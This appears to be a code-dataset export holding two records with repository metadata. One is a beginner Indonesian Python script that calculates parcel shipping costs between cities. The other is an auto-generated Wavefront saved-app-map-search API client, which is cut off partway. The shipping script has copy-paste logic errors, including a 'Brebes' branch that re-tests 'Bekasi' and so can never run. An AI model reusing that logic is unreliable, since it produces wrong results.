] | 1 | 2020-10-06T15:36:09.000Z | 2020-10-06T15:36:09.000Z | Expedisi Sederhana.py | dhimasdityaa/Program-Expedisi-Sederhana | 6d17dc165c0b71e4831820a1ee5c2900aa679d99 | [
"MIT"
] | null | null | null | Expedisi Sederhana.py | dhimasdityaa/Program-Expedisi-Sederhana | 6d17dc165c0b71e4831820a1ee5c2900aa679d99 | [
"MIT"
] | null | null | null |
def menu():
print('++++++++++++++++++++++++++++++++++++++')
print('+ Selamat Datang di Program Expedisi +')
print('++++++++++++++++++++++++++++++++++++++')
print('1. Kirim Paket')
print('2. Cek Onkir')
def kirimPaket():
namaP = str(input('Masukan Nama Pengirim : '))
descP = str(input('Masukan Deskripsi Paket : '))
noP = int(input('Masukan Nomer Handphone Pengirim : '))
namaPe = str(input('Masukan Nama Penerima : '))
AlaPe = str(input('Masukan Alamat Penerima : '))
noPe = int(input('Masukan Nomer Handphone Penerima : '))
AsalP = str(input('Masukan Lokasi Pengirim : '))
tujuPe = str(input('Masukan Lokasi Penerima : '))
berat = int(input('Masukan Berat Paket : '))
def result():
total = int(ongkir) * int(berat)
print('+================================================+')
print('+++++++++++ BUKTI PEMBAYARAN PENGIRIMAN ++++++++++')
print('+================================================+')
print('+ Nama Pengirim :', namaP)
print('+ No Handphone pengirim :', noP)
print('+ Nama Penerima :', namaPe)
print('+ Alamat Penerima :', AlaPe)
print('+ No Handphone Penerima :', noPe)
print('+ Deskripsi Paket :', descP)
print('+ Asal Paket dari :', AsalP)
print('+ Tujuan Paket Ke :', tujuPe)
print('+ Berat Paket Adalah :', berat)
print('+ Biaya Pengiriman :', total)
print('+================================================+')
# AsalP Paket Dari Surabaya
if AsalP == "Surabaya":
if tujuPe == "Bekasi":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 50000
result()
elif tujuPe == "Cikarang":
ongkir = 40000
result()
elif tujuPe == "Jogja":
ongkir = 25000
result()
elif tujuPe == "Malang":
ongkir = 30000
result()
elif tujuPe == "Cilacap":
ongkir = 44000
result()
elif tujuPe == "Brebes":
ongkir = 42000
result()
# AsalP Paket Bekasi
elif AsalP == "Bekasi":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Cikarang
elif AsalP == "Cikarang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Bekasi":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Jogja
elif AsalP == "Jogja":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Bekasi":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Malang
elif AsalP == "Malang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Bekasi":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Cilacap
elif AsalP == "Cilacap":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Bekasi":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# Brebes
elif AsalP == "Bekasi":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Bekasi":
ongkir = 33000
result()
def cekOnkir():
AsalP = str(input('Masukan Kota Asal Pengiriman :'))
tujuPe = str(input('Masukan Kota Tujuan Penerima :'))
berat = int(input('Masukan Berat Paket :'))
def result():
total = int(ongkir) * int(berat)
print('+--------------------------------------------+')
print('|--------------- LACAK PAKET ----------------|')
print('+--------------------------------------------+')
print('| Kota Asal Pengirim :', AsalP)
print('| Kota Tujuan Penerima :', tujuPe)
print('| Biaya Ongkos Kirim :', ongkir, 'Per Kg')
print('| Berat Paket :', berat, 'Kg')
print('| Total Biaya Pengiriman :', total)
print('+--------------------------------------------+')
# AsalP Paket Dari Surabaya
if AsalP == "Surabaya":
if tujuPe == "Bekasi":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 50000
result()
elif tujuPe == "Cikarang":
ongkir = 40000
result()
elif tujuPe == "Jogja":
ongkir = 25000
result()
elif tujuPe == "Malang":
ongkir = 30000
result()
elif tujuPe == "Cilacap":
ongkir = 44000
result()
elif tujuPe == "Brebes":
ongkir = 42000
result()
# AsalP Paket Bekasi
elif AsalP == "Bekasi":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Cikarang
elif AsalP == "Cikarang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Bekasi":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Jogja
elif AsalP == "Jogja":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Bekasi":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Malang
elif AsalP == "Malang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Bekasi":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# AsalP Paket Cilacap
elif AsalP == "Cilacap":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Bekasi":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
# Brebes
elif AsalP == "Bekasi":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Bekasi":
ongkir = 33000
result()
menu()
pilih = int(input('Silahkan Pilih : '))
if pilih == 1:
kirimPaket()
else:
cekOnkir()
| 29.329923 | 68 | 0.419428 | 879 | 11,468 | 5.472127 | 0.091013 | 0.174636 | 0.279418 | 0.061123 | 0.824948 | 0.81289 | 0.81289 | 0.81289 | 0.81289 | 0.81289 | 0 | 0.076983 | 0.441577 | 11,468 | 390 | 69 | 29.405128 | 0.67411 | 0.022585 | 0 | 0.891967 | 0 | 0 | 0.178376 | 0.033694 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01385 | false | 0 | 0 | 0 | 0.01385 | 0.077562 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f2fbc40499f546e3bbfb158071cbde1b4a268523 | 33,689 | py | Python | wavefront_api_client/api/saved_app_map_search_api.py | httpsgithu/python-client | f85a530367cdabe458a11919ad35609b9bc0606b | [
"Apache-2.0"
] | null | null | null | wavefront_api_client/api/saved_app_map_search_api.py | httpsgithu/python-client | f85a530367cdabe458a11919ad35609b9bc0606b | [
"Apache-2.0"
] | null | null | null | wavefront_api_client/api/saved_app_map_search_api.py | httpsgithu/python-client | f85a530367cdabe458a11919ad35609b9bc0606b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class SavedAppMapSearchApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_saved_app_map_search(self, **kwargs): # noqa: E501
"""Create a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_saved_app_map_search(async_req=True)
>>> result = thread.get()
:param async_req bool
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_saved_app_map_search_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_saved_app_map_search_with_http_info(**kwargs) # noqa: E501
return data
def create_saved_app_map_search_with_http_info(self, **kwargs): # noqa: E501
"""Create a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_saved_app_map_search_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_saved_app_map_search" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_saved_app_map_search(self, id, **kwargs): # noqa: E501
"""Delete a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_saved_app_map_search(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_saved_app_map_search_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_saved_app_map_search_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_saved_app_map_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_saved_app_map_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_saved_app_map_search_for_user(self, id, **kwargs): # noqa: E501
"""Delete a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_saved_app_map_search_for_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_saved_app_map_search_for_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_saved_app_map_search_for_user_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_saved_app_map_search_for_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_saved_app_map_search_for_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_saved_app_map_search_for_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_saved_app_map_search_for_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/owned/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_saved_app_map_searches(self, **kwargs): # noqa: E501
"""Get all searches for a customer # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_saved_app_map_searches_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_saved_app_map_searches_with_http_info(**kwargs) # noqa: E501
return data
def get_all_saved_app_map_searches_with_http_info(self, **kwargs): # noqa: E501
"""Get all searches for a customer # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_saved_app_map_searches" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_saved_app_map_searches_for_user(self, **kwargs): # noqa: E501
"""Get all searches for a user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches_for_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs) # noqa: E501
return data
def get_all_saved_app_map_searches_for_user_with_http_info(self, **kwargs): # noqa: E501
"""Get all searches for a user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches_for_user_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_saved_app_map_searches_for_user" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/owned', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_saved_app_map_search(self, id, **kwargs): # noqa: E501
"""Get a specific search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_saved_app_map_search(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
return data
def get_saved_app_map_search_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a specific search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_saved_app_map_search_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_saved_app_map_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_saved_app_map_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_saved_app_map_search(self, id, **kwargs): # noqa: E501
"""Update a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
return data
def update_saved_app_map_search_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_saved_app_map_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_saved_app_map_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_saved_app_map_search_for_user(self, id, **kwargs): # noqa: E501
"""Update a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_for_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs) # noqa: E501
return data
def update_saved_app_map_search_for_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_for_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
